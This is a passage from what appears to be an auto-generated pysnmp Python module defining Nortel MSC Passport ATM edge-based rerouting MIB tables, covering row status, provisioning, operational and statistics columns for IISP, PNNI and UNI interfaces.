if mibBuilder.loadTexts: mscAtmIfIispEbrIndex.setStatus('mandatory')
mscAtmIfIispEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 20), )
if mibBuilder.loadTexts: mscAtmIfIispEbrProvTable.setStatus('mandatory')
mscAtmIfIispEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfIispIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfIispEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfIispEbrProvEntry.setStatus('mandatory')
mscAtmIfIispEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfIispEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfIispEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfIispEbrPathOptimization.setStatus('mandatory')
mscAtmIfIispEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30), )
if mibBuilder.loadTexts: mscAtmIfIispEbrOperTable.setStatus('mandatory')
mscAtmIfIispEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfIispIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfIispEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfIispEbrOperEntry.setStatus('mandatory')
mscAtmIfIispEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfIispEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfIispEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfIispEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfIispEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfIispEbrIneligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfIispEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 40), )
if mibBuilder.loadTexts: mscAtmIfIispEbrStatsTable.setStatus('mandatory')
mscAtmIfIispEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfIispIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfIispEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfIispEbrStatsEntry.setStatus('mandatory')
mscAtmIfIispEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfIispEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfIispEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfIispEbrTotalPathOptimizations.setStatus('mandatory')
mscAtmIfVptIispEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7))
mscAtmIfVptIispEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1), )
if mibBuilder.loadTexts: mscAtmIfVptIispEbrRowStatusTable.setStatus('mandatory')
mscAtmIfVptIispEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfVptIispIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptIispEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptIispEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfVptIispEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrRowStatus.setStatus('mandatory')
mscAtmIfVptIispEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrComponentName.setStatus('mandatory')
mscAtmIfVptIispEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrStorageType.setStatus('mandatory')
mscAtmIfVptIispEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVptIispEbrIndex.setStatus('mandatory')
mscAtmIfVptIispEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 20), )
if mibBuilder.loadTexts: mscAtmIfVptIispEbrProvTable.setStatus('mandatory')
mscAtmIfVptIispEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfVptIispIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptIispEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptIispEbrProvEntry.setStatus('mandatory')
mscAtmIfVptIispEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfVptIispEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrPathOptimization.setStatus('mandatory')
mscAtmIfVptIispEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30), )
if mibBuilder.loadTexts: mscAtmIfVptIispEbrOperTable.setStatus('mandatory')
mscAtmIfVptIispEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfVptIispIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptIispEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptIispEbrOperEntry.setStatus('mandatory')
mscAtmIfVptIispEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfVptIispEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfVptIispEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrIneligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfVptIispEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 40), )
if mibBuilder.loadTexts: mscAtmIfVptIispEbrStatsTable.setStatus('mandatory')
mscAtmIfVptIispEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfVptIispIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptIispEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptIispEbrStatsEntry.setStatus('mandatory')
mscAtmIfVptIispEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVptIispEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrTotalPathOptimizations.setStatus('mandatory')
mscAtmIfVptPnniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7))
mscAtmIfVptPnniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1), )
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrRowStatusTable.setStatus('mandatory')
mscAtmIfVptPnniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfVptPnniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptPnniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfVptPnniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrRowStatus.setStatus('mandatory')
mscAtmIfVptPnniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrComponentName.setStatus('mandatory')
mscAtmIfVptPnniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrStorageType.setStatus('mandatory')
mscAtmIfVptPnniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrIndex.setStatus('mandatory')
mscAtmIfVptPnniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 20), )
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrProvTable.setStatus('mandatory')
mscAtmIfVptPnniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfVptPnniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptPnniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrProvEntry.setStatus('mandatory')
mscAtmIfVptPnniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfVptPnniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrPathOptimization.setStatus('mandatory')
mscAtmIfVptPnniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30), )
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrOperTable.setStatus('mandatory')
mscAtmIfVptPnniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfVptPnniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptPnniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrOperEntry.setStatus('mandatory')
mscAtmIfVptPnniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfVptPnniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfVptPnniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrIneligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfVptPnniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 40), )
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrStatsTable.setStatus('mandatory')
mscAtmIfVptPnniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfVptPnniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptPnniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrStatsEntry.setStatus('mandatory')
mscAtmIfVptPnniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVptPnniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrTotalPathOptimizations.setStatus('mandatory')
mscAtmIfVptUniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7))
mscAtmIfVptUniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1), )
if mibBuilder.loadTexts: mscAtmIfVptUniEbrRowStatusTable.setStatus('mandatory')
mscAtmIfVptUniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfVptUniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptUniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptUniEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfVptUniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrRowStatus.setStatus('mandatory')
mscAtmIfVptUniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrComponentName.setStatus('mandatory')
mscAtmIfVptUniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrStorageType.setStatus('mandatory')
mscAtmIfVptUniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVptUniEbrIndex.setStatus('mandatory')
mscAtmIfVptUniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 20), )
if mibBuilder.loadTexts: mscAtmIfVptUniEbrProvTable.setStatus('mandatory')
mscAtmIfVptUniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfVptUniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptUniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptUniEbrProvEntry.setStatus('mandatory')
mscAtmIfVptUniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfVptUniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrPathOptimization.setStatus('mandatory')
mscAtmIfVptUniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30), )
if mibBuilder.loadTexts: mscAtmIfVptUniEbrOperTable.setStatus('mandatory')
mscAtmIfVptUniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfVptUniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptUniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptUniEbrOperEntry.setStatus('mandatory')
mscAtmIfVptUniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfVptUniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfVptUniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrIneligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfVptUniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 40), )
if mibBuilder.loadTexts: mscAtmIfVptUniEbrStatsTable.setStatus('mandatory')
mscAtmIfVptUniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfVptUniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptUniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptUniEbrStatsEntry.setStatus('mandatory')
mscAtmIfVptUniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVptUniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrTotalPathOptimizations.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOv = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2))
mscAtmIfVptVccSrcEbrOvRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1), )
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvRowStatusTable.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmNetworkingMIB", "mscAtmIfVptVccSrcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptVccSrcEbrOvIndex"))
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvRowStatusEntry.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvRowStatus.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvComponentName.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvStorageType.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvIndex.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 20), )
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvProvTable.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmNetworkingMIB", "mscAtmIfVptVccSrcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptVccSrcEbrOvIndex"))
